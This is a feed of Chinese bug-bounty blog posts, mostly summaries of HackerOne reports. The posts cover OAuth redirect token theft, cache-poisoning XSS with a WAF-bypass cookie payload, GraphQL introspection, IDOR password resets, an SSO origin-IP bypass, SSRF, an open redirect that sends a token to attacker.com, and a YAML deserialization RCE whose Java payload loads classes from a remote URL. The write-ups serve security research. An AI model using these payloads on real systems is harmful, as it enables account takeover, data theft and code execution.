迪哥讲事

通过redirect_uri来获取用户oauth令牌

Mon, 18 May 2026 11:00:00 +0800

原创 h1 2026-05-18 11:00 四川

通过redirect_uri来获取用户oauth令牌

正文

正常情况下与攻击情况下的请求对比：

正常情况下的请求：

https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149
redirect_uri: https://booth.pm/users/auth/pixiv/callback

该请求在 OAuth 认证流程完成后会将用户重定向到 booth.pm 的回调地址。

攻击情况下的请求：

https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/4503924&response_type=code&scope=read-works+read-favorite-users+read-friends+read-profile+read-email+write-profile&state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149
redirect_uri: https://booth.pm/users/auth/pixiv/callback/../../../../ja/items/4503924

通过路径遍历漏洞，攻击者将用户重定向到自己的商品页面 https://booth.pm/ja/items/4503924，并可能通过 Google Analytics 等工具暴露用户的授权码。

如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1861974

跳转微信打开

缓存投毒导致的 XSS 接管账号

Fri, 15 May 2026 11:00:00 +0800

原创 h1 2026-05-15 11:00 四川

缓存投毒导致的 XSS 接管账号

正文

通过缓存投毒导致的 XSS 接管账号。

原因是：

hav Cookie 会被反射到这个响应里：

https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js

代码类似：

var hav="cookie 值"

服务器有一种“保护”机制，会隐藏双引号 "，但是它没有处理大于号和小于号，也就是 < 和 >。这使我可以闭合 script 标签。并且借助这个双引号隐藏机制，我还能轻松绕过 WAF。

当我这样发送 Cookie 时，WAF 会触发：

Cookie: hav=xss"

但是通过在关键字中插入双引号，可以绕过 WAF：

Cookie: hav=xss"ript>"g/onloa"d=aler"t"(document.doma"in)>

服务器最终反射出来的响应会变成：

var hav="xss

服务器认为： https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js

是一个可以缓存的响应。因此，Cookie 中反射出来的恶意内容会被缓存到这个页面里。之后任何用户访问这个 URL，都会触发 XSS。

虽然 Session Cookie 设置了 HttpOnly，JavaScript 不能直接读取它，但是在同一个存在 XSS 的页面里，有一个 JavaScript 变量：

window.INITIAL_STATE.system.cookie

这里明文保存了 Session。

这四个因素结合起来，最终导致我能够接管用户账号。

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1760213

跳转微信打开

【项目实战】另一种Swagger测试思路

Thu, 14 May 2026 10:00:00 +0800

隐雾安全 2026-05-14 10:00 四川

以下文章来源于：隐雾安全

隐雾安全

隐雾，为您提供职业成功的关键。

📝 编者语很多人在做接口测试时，第一反应是：找Swagger文档但在实际项目中，越来越多的系统开始使用：Gr

📝 编者语

很多人在做接口测试时，第一反应是：

找Swagger文档

但在实际项目中，越来越多的系统开始使用：

GraphQL
内置调试面板（console / playground）

这些东西，本质上就是：

另一种“接口文档”

这篇文章，我们用一个真实案例，走一遍：

从一个功能点 → 找到 GraphQL → 拿到接口结构 → 发现未授权接口

GraphQL 和 Swagger 是什么关系？

很多人会把这两个当成完全不同的东西，其实可以这样理解：

🔹 Swagger（传统接口文档）

提前写好接口说明：

URL
参数
返回

🔹 GraphQL（动态接口文档）

接口是“自描述”的：

可以查询接口结构
可以动态拼请求
可以直接调试

🧠 核心区别

类型	特点
Swagger	静态文档
GraphQL	可查询的接口结构

所以在挖洞时：

GraphQL = 自带“接口枚举能力”的文档系统

实战案例（500）

第一步：发现入口

🔍 起点：一个普通功能点

在测试过程中，点到了一个功能：

删除地址

顺手做了一件事

看目录结构

发现一个路径：

/graphql

⚠️ 这个路径意味着什么？

在经验里：

出现 /graphql，基本可以判断：

存在 GraphQL 服务
可能有调试接口
很可能存在接口暴露

第二步：探测 GraphQL 是否可用

接下来就是一个标准动作：

发一个 introspection 查询

📦 请求数据（核心）

{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

🔍 返回结果

如果返回结构信息，比如：

type
query
mutation

👉 就说明：

GraphQL introspection 开启了

📌 这一步的意义

👉 相当于：

拿到了整个接口结构

第三步：目录扫描

对 /graphql 目录进行扫描

🔎 扫描结果

发现多个接口：

/api/graphql/console

/api/graphql/graphql

/api/graphql/graphql-playground

/api/graphql/v1

⚠️ 这些路径意味着什么？

逐个解释👇

路径

作用

console 调试控制台

playground 图形化测试工具

graphql 主接口

v1 版本接口

👉 重点来了：

这些“调试接口”，很多情况下是没有鉴权的

第四步：直接打 console

选择了一个最典型的接口：

POST /api/graphql/console

📦 请求内容

POST /api/graphql/console HTTP/2

{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

🔍 返回结果

成功返回接口结构数据。

⚠️ 这个时候其实已经可以确认：

👉 存在未授权访问

总结漏洞本质

如果总结一下，其实是三层问题叠加：

🧩 问题拆解

1️⃣ GraphQL introspection 未关闭

👉 可以直接获取接口结构

2️⃣ 调试接口暴露

👉 console/playground 对外开放

3️⃣ 未做鉴权

👉 任何人都可以访问

📌 最终效果

👉 外部用户可以：

枚举接口
构造请求
直接调用

整个挖掘流程

🧭 挖洞流程

功能点（删除地址）

↓

发现 /graphql

↓

发送 introspection 查询

↓

确认 GraphQL 开启

↓

扫描目录

↓

发现 console / playground

↓

直接访问接口

↓

未授权成功

这个思路可以怎么复用？

这个案例最有价值的，其实不是漏洞本身，而是：

一套可以复用的测试方法

固定动作

现在只要看到这些：

/graphql
/api/graphql
/playground
/console

做三件事：

1️⃣ 先打 introspection

判断：

👉 能不能拿到 schema

2️⃣ 扫目录

找：

console
playground
版本接口

3️⃣ 测未授权

直接发请求：

👉 看是否需要登录

一个很重要的认知

做接口测试时，不要局限在：

参数
权限
越权
接口文档本身，就是攻击面
如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

任意用户密码重置

Wed, 13 May 2026 10:00:00 +0800

pippybear 2026-05-13 10:00 四川

以下文章来源于：安全无界

安全无界

面向年轻的网络安全爱好者，分享网络安全技术、工具和趋势。

声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

这是很久之前的一次授权渗透测试，测试目标是人才系统，细心的兄弟应该可以猜到，没错这就是上一个测试的续集，上次测试的时候系统还未完善，部分功能还没有上，这不整合着漏洞修复一起直接再来一次。

整体瞅了一眼，一目了然的多了一个找回密码的功能，emmmm，那还说啥直接优先对待。

稍微回顾一下上文，注册的时候就包含身份证和密保问题，如下。

这不就简单了嘛，先直接用注册的信息，走通一下逻辑。成功进入到密码重置页面。

轻轻松松，emmmm，看到这里，基本可以预估漏洞跑不掉了，试试看，输入任意密码，直接点击重置，抓包如下。

我就知道，这种场景基本上很大可能会存在，很少有会基于这个条件判断加一个凭证校验的，毕竟开发大佬主打的还是简单为主。直接修改USERNAME为admin，emmmm再次成功修改管理员密码。

使用修改后的密码成功登录系统。

emmmm，梅开二度，赶紧写完报告交付给客户。

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

权限绕过

Tue, 12 May 2026 10:03:00 +0800

原创 h1 2026-05-12 10:03 四川

权限绕过

正文

正文主机使用Akamai作为负载均衡器，并将流量路由到内部服务器：

root@doggos:~# dig A ████
-- snip --
;; ANSWER SECTION:
███. 2386 IN CNAME █████.
████. 1554 IN CNAME ███.
███████. 180 IN CNAME e1010.d.akamaiedge.akamai.█████████.
e1010.d.akamaiedge.akamai.██████. 20 IN A ██████████
~

访问该网站时，您会被重定向到https://█████████/pool/sso/authenticate/l/2?m=GET&r=t&u=https%3A%2F%2F████████%2F，要求访问者通过SSO进行身份验证。然而，我能够找到此服务器的原始IP地址。访问此原始IP会完全绕过██████████ SSO，使访问者能够以认证用户身份使用该应用程序。

使用以下命令验证██████是否为██████████的原始IP地址，通过从SSL证书中提取名称

root@doggos:~# true | openssl s_client -connect ██████:443 2>/dev/null | openssl x509 -noout -text | perl -l -0777 -ne '@names=/\bDNS:([^\s,]+)/g; print join("\n", sort @names);'

思路分析:

第一步：访问应用时会被重定向到SSO认证页面。攻击者无法直接访问应用内容。

第二步：通过使用dig命令查找DNS记录，攻击者发现了该服务器的原始IP地址。

第三步：使用openssl s_client命令从SSL证书中提取服务器的DNS名称，确认该IP确实是原始IP。

第四步：直接访问此原始IP地址，绕过了SSO认证，成功以认证用户身份访问了应用程序。

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/736391

跳转微信打开

ssrf的一个另类思路

Mon, 11 May 2026 10:01:00 +0800

原创 h1 2026-05-11 10:01 四川

HTML Entity 绕过

正文

1.在 VPS 上启动 interact.sh 服务，或者使用 Burp Suite Collaborator。

2.访问：https://███/xmlrpc.php

页面返回：

XML-RPC server accepts POST requests only.

1.使用 Burp Suite，把该请求发送到 Repeater。

2.将请求方法改为 POST。

3.获取你的监听服务器 URL，并使用以下 XML payload：

"1.0" encoding="UTF-8"?>

  pingback.ping
  
    
      https://your-server
    
    
      https://█████/

1.发送 POST 请求。

2.在你的服务器日志中可以看到来自目标服务器的请求。

这里ssrf的思路有点另类,将请求方法改变

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1890719

跳转微信打开

有意思的逻辑缺陷

Fri, 08 May 2026 10:01:00 +0800

pippybear 2026-05-08 10:01 四川

以下文章来源于：安全无界

安全无界

面向年轻的网络安全爱好者，分享网络安全技术、工具和趋势。

声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

这是很久之前的一次授权渗透测试，测试目标是客户的人才系统，粗略的看了一下有注册功能，舒服，终于不是从0开始的局面了。

废话不多说，直接开始正文，有注册功能，那必须先注册一个用户登进系统瞅瞅。

三下五除二，直接注册了一个测试账号张三，顺利登录系统，如下。

但是吧，似乎功能有限，能见度有点低，为数不多的功能就是个人信息了，那就先看看这个吧，查看个人信息非/id类路由，无法越权查看，只能试试编辑和文件上传，emmmm，很显然这么早出场的一般都没有啥结果。

啥也没有，可以看到编辑报文这里USER_ID目前为hash不易操作，但是似乎还有一个USERNAME，虽然一般都是使用USER_ID做校验的，但是万一呢，直接修改USERNAME为admin。

一如既往的修改成功，咋一看似乎没啥效果，使用admin+密码发现居然可以成功登录系统，好家伙，看来IDOR还真存在，居然直接给管理员密码给改掉了。

不愧是管理员，权限就是不一般，赶紧和客户报备一下，管理员密码已修改。emmmm，剩下的测试就不做多述。

最后总结还是那句话，渗透难不难永远取决于开发大佬姿势骚不骚，收工。

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

js伪协议绕过

Thu, 07 May 2026 10:01:00 +0800

原创 h1 2026-05-07 10:01 四川

正文

HTML Entity 绕过

"ja	vascript:alert(1)">

👉 浏览器解析：

	 → \t（制表符）

最终：

javascript:alert(1)

原理 HTML 会自动 decode 实体

javascript: 被拆开 → 绕过关键字检测

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

跳转微信打开

利用302实现xss的一个思路

Wed, 06 May 2026 10:02:00 +0800

原创 h1 2026-05-06 10:02 四川

利用302实现xss的一个思路

正文

正常情况下: 302

https://dev.twitter.com/https:/%5cblackfan.ru/
#响应
HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru

生成xss的poc:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
#响应
HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...
You should be redirected automatically to target URL: "javascript:alert(document.cookie)">javascript:alert(document.cookie).  If not click the link.

payload:

/x:1/:///%01javascript:alert(document.cookie)/

666

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/260744

https://hackerone.com/reports/330008

跳转微信打开

重定向绕过另类思路

Tue, 05 May 2026 10:00:00 +0800

原创 h1 2026-05-05 10:00 四川

正文

正常情况下的请求流程

用户点击登录

GET /login?redirectUrl=https://cs.money/dashboard&callbackUrl=https://cs.money/dashboard HTTP/1.1
Host: auth.dota.trade

登录成功后的重定向（服务端返回）

HTTP/1.1 302 Found
Location: https://cs.money/dashboard?token=USER_TOKEN

浏览器跳转

GET /dashboard?token=USER_TOKEN HTTP/1.1
Host: cs.money

存在漏洞时的请求流程（Open Redirect）

构造恶意登录 URL

GET /login?redirectUrl=https://cs.money///attacker.com%2523&callbackUrl=https://cs.money///attacker.com%2523 HTTP/1.1
Host: auth.dota.trade

登录成功后的响应

HTTP/1.1 302 Found
Location: https://cs.money///attacker.com#?token=USER_TOKEN

浏览器解析（关键点）浏览器会把：

https://cs.money///attacker.com

解析为：

https://attacker.com

实际跳转请求

GET /#?token=USER_TOKEN HTTP/1.1
Host: attacker.com

这里重定向的思路就是添加三个斜杠--->///

主要做一个记录

假期最后一天,优惠还有

参考

https://hackerone.com/reports/905607

跳转微信打开

盲sssrf典型测试方法

Mon, 04 May 2026 10:00:00 +0800

原创 h1 2026-05-04 10:00 四川

盲sssrf典型测试方法

正文

敏感参数为url:

GET /api/v1/http/default/raw?regex=%22service.name%22:/s%22(package-registry)%22&statusCodeMax=200&statusCodeMin=200&url=http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:22 HTTP/1.1
Host: fleet-status.app.elstc.co
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close

端口检测结果

若指定22 端口，返回：

{"type":"HTTP-RAW","status":"WARNING","label":"http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:22","message":"timeout/host unreachable"}

端口未开放

若指定80 端口，返回：

{"type":"HTTP-RAW","status":"FAILURE","label":"http://p8yfvg6nige7z2ndagpf3v181z7pve.burpcollaborator.net:80","value":{"values":["ift3z4lojdng3fv7r68q5szjigz"],"unit":"RAW"}}

端口 80 开放

如果对应的端口没有开放,那么会报错timeout/host unreachable：超时 / 主机不可达

典型的ssrf测试方法

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1300585

跳转微信打开

云存储桶可以实现列对象的一种绕过思路

Fri, 01 May 2026 10:01:00 +0800

原创 h1 2026-05-01 10:01 四川

云存储桶可以实现列对象的一种绕过思路

正文

1.这里使用一个公开的 Prow 实例作为示例（实际漏洞是在私有项目测试中发现的，无法披露）：

https://prow.falco.org

1.漏洞接口如下：

https://prow.falco.org/job-history/s3/falco-prow-logs/%2e%3f

Prow 原本只期望加载日志文本文件，并且会在 S3 URL 后自动追加 /latest.txt 进行签名。

但是：

通过传入 /.（即 %2e），可以访问 Bucket 的基础路径

通过编码的 ?（%3f），可以注释掉后面的 /latest.txt

因此最终被签名的 URL 实际变成：

s3://falco-prow-logs/.?/latest.txt 效果是：

实际签名的是 Bucket 根路径

返回的是整个 Bucket 的文件列表（类似目录 listing）

此外，这种技巧还可以读取任意文件：

https://prow.falco.org/job-history/s3/falco-prow-logs/any.valid.file%3f

注意其绕过手法

核心问题有 3 个：

（1）用户输入直接参与 S3 签名路径 Prow 提供了一个接口：

/job-history/s3/{bucket}/{path} 但：

{path} 没有做严格校验

用户可以构造特殊路径

（2）拼接逻辑存在缺陷

系统逻辑类似：

final_path = user_input + "/latest.txt" sign(final_path) 问题：

假设 user_input = .?\

实际 URL：

s3://bucket/.?/latest.txt 但：

? 在 URL 中是 query 分隔符

后面的 /latest.txt 被浏览器/服务端忽略

实际签名对象变成：

s3://bucket/.

（3）S3 Bucket 支持 List 操作

如果 Bucket 权限允许（常见于内部日志桶）：

GET / → 返回对象列表

结果：目录遍历（Bucket Listing）

五一假期来了，星球也已经运营三年多了，发个优惠券

参考

https://hackerone.com/reports/1485500

跳转微信打开

由一个反序列化问题所想到的通用思路

Thu, 30 Apr 2026 10:00:00 +0800

原创 h1 2026-04-30 10:00 四川

由一个反序列化问题所想到的思路

正文

如果使用 io.kubernetes.client.util.generic.dynamic.Dynamics 来把不受信任的 YAML 反序列化成 DynamicKubernetesObject，攻击者就可以在 JVM 内实现代码执行。

复现步骤：搭一个服务器，提供一个包含如下代码的 JAR 文件：

package org.jlleitschuh.sandbox;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
public class ScriptEngineFactoryRCE implements ScriptEngineFactory {
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec("open -a Calculator");
            p.waitFor();
        } catch (IOException | InterruptedException e) {
            throw new RuntimeException(e);
        }
    }
    @Override
    public String getEngineName() {
return null;
    }
    @Override
    public String getEngineVersion() {
return null;
    }
    @Override
    public List getExtensions() {
return null;
    }
    @Override
    public List getMimeTypes() {
return null;
    }
    @Override
    public List getNames() {
return null;
    }
    @Override
    public String getLanguageName() {
return null;
    }
    @Override
    public String getLanguageVersion() {
return null;
    }
    @Override
    public Object getParameter(String key) {
return null;
    }
    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
    }
    @Override
    public String getOutputStatement(String toDisplay) {
return null;
    }
    @Override
    public String getProgram(String... statements) {
return null;
    }
    @Override
    public ScriptEngine getScriptEngine() {
return null;
    }
}

这个 JAR 文件中还必须包含一个文件：

/META-INF/services/javax.script.ScriptEngineFactory

其内容为：

org.jlleitschuh.sandbox.ScriptEngineFactoryRCE # 我们的 RCE 载荷把这个 JAR 放在本地服务器根路径对外提供。

然后调用 Dynamics 的 YAML 解析 API，并传入如下 payload：

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]] payload本质上是在告诉 YAML 解析器：

1.构造一个 URL

指向 http://localhost:8080/

2.用这个 URL 构造一个 URLClassLoader

也就是让 JVM 可以从这个远程地址加载类

3.再把这个 URLClassLoader 作为参数传给 ScriptEngineManager

ScriptEngineManager 在初始化时会通过 Java SPI 机制扫描 META-INF/services/javax.script.ScriptEngineFactory

4.一旦扫描到你远程 JAR 里的 ScriptEngineFactoryRCE

JVM 会加载这个类

类加载时静态代码块 static { ... } 就会执行

虽然这是一个YAML 反序列化所导致的问题,但是蛮值得思考

像类似于yaml这类配置文件或者说是部署的业务场景很有可能会导致代码执行的问题,可以尽可能地去寻找这类业务场景去尝试,这是一个通用思路

假期来了,发个100元优惠券

参考

https://hackerone.com/reports/1807214

跳转微信打开

Java "幽灵比特位"（Ghost Bits）引发的waf通杀

Wed, 29 Apr 2026 10:09:00 +0800

迪哥讲事 2026-04-29 10:09 四川

正文

Java 是目前企业级应用中最广泛使用的编程语言之一，其生态内的 Spring、Tomcat、Jackson、fastjson 等框架和组件被全球数以亿计的系统所依赖。2026 年 4 月，在 Black Hat Asia 2026 大会上，安全研究员 Zhihui Chen（1ue）与安全研究员 Xinyu Bai（浅蓝）发表了题为《Cast Attack: A New Threat Posed by Ghost Bits in Java》的研究成果。

该研究揭示了 Java 生态中一个系统性、长期被忽视的底层编码缺陷——"Ghost Bits（幽灵比特位）"，并证明攻击者可利用该缺陷对 WAF/IDS 等安全设备实现全面绕过，进而触发 SQL 注入、反序列化 RCE、文件上传、SMTP 注入、请求走私等多种高危攻击链。漏洞影响范围覆盖 Java 主流框架与中间件，利用门槛低，建议相关用户高度重视并尽快完成自查修复。

Ghost Bits/幽灵比特成因：

Java 里的 char 是 16 位，但某些代码把它强行转成 8 位 byte 。

结果造成：高 8 位被悄悄丢掉，只剩低 8 位。攻击者可以利用这个特性，让安全检查看到“奇怪中文/Unicode”，但底层真正执行时变成危险字符

比如：

陪 = U+966A
低 8 位 = 0x6A
0x6A = ASCII 字符 'j'

所以：

1.陪sp

在某些 Java 处理链里可能会变成：

1.jsp

WAF / 文件类型检查看到的是：

1.陪sp

服务器保存时却可能变成：

1.jsp

受影响组件

以下组件已被确认受 Ghost Bits 影响：

组件	漏洞类型
Apache Commons BCEL	WAF 绕过 / 反序列化 RCE
Jackson Databind	WAF 绕过 / SQL 注入
Fastjson	WAF 绕过 / 反序列化 RCE
Apache Tomcat	文件上传绕过（Webshell）
Spring Framework	URL 解码绕过 / 路径穿越
Jetty	URL 解码绕过 / CRLF 注入
Undertow	URL 解码绕过
Vert.x	URL 解码绕过
Angus Mail	SMTP 注入
Apache HttpClient ≤ 4.5.9	HTTP 请求走私（HTTPCLIENT-1974/1978）
ActiveJ	HTTP CRLF 注入
Lettuce（Redis 客户端）	Redis 命令注入
Jodd	路径穿越
XMLWriter	XML 标签注入

造成的影响

WAF/IDS 全面绕过：攻击者通过 Ghost Bits 变形 Payload 可绕过绝大多数现有基于规则的 WAF 检测，使已有安全防护形同虚设。

触发多类高危漏洞：

SQL 注入：Jackson charToHex（ch & 255）截断，SQL 注入 Payload 隐写于 Unicode 字符中，WAF 无告警，后端还原并执行。
反序列化 RCE：BCEL ClassLoader 解码、fastjson \u/ \x 转义均存在 Ghost Bits，可绕过 WAF 触发反序列化远程代码执行。
文件上传绕过：Tomcat RFC2231Utility 处理文件名时截断高位，可将 .jsp 伪装为非敏感 Unicode 字符，绕过 WAF 上传 Webshell。
路径穿越 / 认证绕过：Spring、Jetty、Undertow、Vert.x 等框架 URL 解码路径存在 Ghost Bits，可绕过 WAF 实现目录穿越；Openfire CVE-2023-32315 可借此绕过 WAF 防护直接利用。
已知高危 CVE WAF 绕过：GeoServer CVE-2024-36401（CVSS 9.8）、Spring4Shell（CVE-2022-22965）等漏洞的现有 WAF 防护均可被 Ghost Bits 变体 Payload 绕过，直接触发 RCE。
SMTP 注入：Angus Mail 等邮件库存在 Ghost Bits，可将隐写 CRLF 序列还原为换行符，触发 SMTP 注入，实现邮件劫持或业务逻辑绕过（已在 Jira、Confluence 上复现）。
HTTP 请求走私 / XSS：Apache HttpClient（≤ 4.5.9）、JDK 原生 HttpServer 等组件同样受 Ghost Bits CRLF 影响。

解决修复方案

请关注上述各受影响组件的官方 Security Advisory，升级至已修复版本。

重点关注：

Apache Commons BCEL：升级至 6.12.0 及以上版本 Fastjson：升级至 2.x 系列最新版本
Apache HttpClient：升级至 4.5.10 及以上版本，或迁移至 HttpClient 5.x
GeoServer：升级至 2.28.3 及以上版本
Openfire：升级至 5.0.4 及以上版本

临时缓解方案:

WAF 规则：现有基于字符串特征的 WAF 规则对 Ghost Bits 变形 Payload 防护效果有限，建议在解码层面进行语义检测，或引入 Unicode 规范化预处理后再执行规则匹配。
代码层面：排查自研代码中 (byte)ch、ch & 0xFF、baos.write(ch)、DataOutputStream#writeBytes() 等写法，改为使用 String.getBytes(StandardCharsets.UTF_8) 等明确指定编码的方式。
输入验证：在输入校验阶段对关键字段（文件名、邮件地址、URL 参数、JSON 键名等）严格过滤非 ASCII 字符或进行 Unicode 归一化（NFC/NFKC）处理。
网络层面：对暴露在公网的 Java 应用服务，在完成代码修复前限制访问来源，降低攻击面。
如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

1.Black Hat Asia 2026 议题：Cast Attack: A New Threat Posed by Ghost Bits in Java 作者：Xinyu Bai（@b1u3r / @iSafeBlue）、Zhihui Chen（@1ue1166323）、贡献者 Zongzheng Zheng（@chun_springX）

2.https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv

3.https://github.com/advisories/GHSA-gw42-f939-fhvm

4.https://spring.io/security/cve-2022-22965

跳转微信打开

csrf删除用户

Tue, 28 Apr 2026 10:01:00 +0800

原创 h1 2026-04-28 10:01 四川

csrf删除用户

正文

复现步骤：

1.进入“创建账户”页面

2.点击你的个人资料（Profile）

3.你会看到“删除账户（DELETE ACCOUNT）”按钮

4.点击该按钮，并在输入框中输入 YES

5.确保你的 Burp Suite 已开启，然后点击删除账户按钮

请求示例：

POST /users/deleteAccount HTTP/1.1
Host: ██████
Cookie: _ga=...; session=...; session.sig=...
User-Agent: Mozilla/5.0 ...
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: https://███████
Referer: https://█████/users/deleteAccount
Content-Length: 0
Connection: close

利用方法：

1.捕获该请求

2.右键 → Engagement Tools → Generate CSRF PoC（生成 CSRF 攻击代码）

生成的示例代码如下：


  
  
    
    "https://████/users/deleteAccount" method="POST">
      type="submit" value="提交请求" />

攻击方式说明：

将上述 HTML 代码部署到你的服务器，并将该页面发送给受害者。一旦受害者打开该页面，其账户将被删除。

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

漏洞赏金猎人系列-如何测试注册功能以及相关Tips‍

参考

https://hackerone.com/reports/1629828

跳转微信打开

【SRC实战】从0到内网访问：SSRF

Mon, 27 Apr 2026 10:01:00 +0800

隐雾安全 2026-04-27 10:01 四川

以下文章来源于：隐雾安全

隐雾安全

隐雾，为您提供职业成功的关键。

📝 编者语

SSRF这个漏洞，它不像XSS那样“容易有反馈”，而且往往藏在一些不太起眼的功能里，比如：头像、模板、接口请求、甚至是一些“看起来只是展示内容”的地方。

这篇文章，我们不只是讲“漏洞是什么”，更重要的是讲清楚：

这个漏洞，是怎么一步一步被挖出来的。

什么是 SSRF？

先用一句话解释：

SSRF=让服务器帮你去请求你指定的地址

举个例子

正常情况：

你访问：

http://example.com/avatar.jpg

是你自己的浏览器去请求。

但如果存在 SSRF：

你输入一个地址：

实际请求的是服务器，而不是你。

为什么有危险？

因为服务器能访问很多你访问不到的东西：

内网 IP（10.0.0.1/192.168.x.x / 172.x.x.x）
内网服务（Redis / MySQL / 管理后台）
云服务元数据（比如 AK / SK）

换句话说：

SSRF=一个可以让你“借服务器视角看世界”的漏洞

SSRF常见利用方向

简单列几个在挖洞时要注意的地方：

探测内网 IP
扫描端口
读取本地文件（file://）
打内部接口
结合其他漏洞（XSS / 文件读取）

SSRF漏洞一般藏在哪？

个高频点

到这里，这个漏洞其实已经成型了

图片加载（头像 / URL 图片）
模板解析（简历 / 富文本 / iframe）
接口请求（URL 参数）
文件解析 / 转换
第三方资源加载

一句话总结：

只要有“服务器去请求外部资源”的地方，就可能有 SSRF

案例讲解

案例一：从“模板功能”，到SSRF全回显

1. 一个简历编辑功能

一开始只是看到一个功能：

简历编辑

这个地方其实一开始是当成XSS点来看的。

因为经验上：

能输入内容 + 能被渲染 → 优先考虑 XSS

2. 它会“生成模板”

在下面还有一个功能：

选择简历模板

当你选择模板之后，系统会：

重新解析你的简历内容，并生成一个新的页面

这个流程里有一个很关键的点：

服务器会去“处理并渲染”你输入的内容

这就意味着：

👉 有机会让服务器“去请求某些东西”

这个时候思路就来了：

如果让它去加载一个 URL，会发生什么？

于是开始测试一些地址：

http://xxx.com
